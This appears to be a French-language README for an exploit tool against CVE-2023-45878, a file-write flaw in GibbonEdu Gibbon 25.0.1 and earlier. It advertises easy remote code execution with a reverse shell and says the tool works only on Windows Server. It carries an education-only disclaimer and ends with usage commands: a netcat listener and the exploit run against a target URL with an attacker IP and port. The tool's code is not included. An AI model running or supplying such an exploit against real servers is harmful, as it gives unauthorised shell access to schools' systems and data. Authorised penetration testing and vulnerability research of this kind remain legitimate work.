
CVE-2023-45878 exploitation facile | reverse shell
GibbonEdu Gibbon version 25.0.1 et antérieure permet l'écriture arbitraire de fichiers
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
Cet exploit est fourni uniquement à des fins éducatives et de recherche. L'utilisation non autorisée de ce code contre des systèmes sans autorisation explicite est illégale et peut violer les lois sur la cybercriminalité dans diverses juridictions. Je décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet exploit.
Il incombe à l'utilisateur de veiller au respect de toutes les lois applicables et des directives éthiques avant d'exécuter ce code. N'utilisez pas cet exploit pour des activités malveillantes.
Cet exploit fonctionne exclusivement sur Windows Server. Si la version vulnérable de Gibbon s'exécute sur un serveur Linux, vous devrez modifier l'exploit en conséquence.
nc -lnvp <PORT>go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT> ou ./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>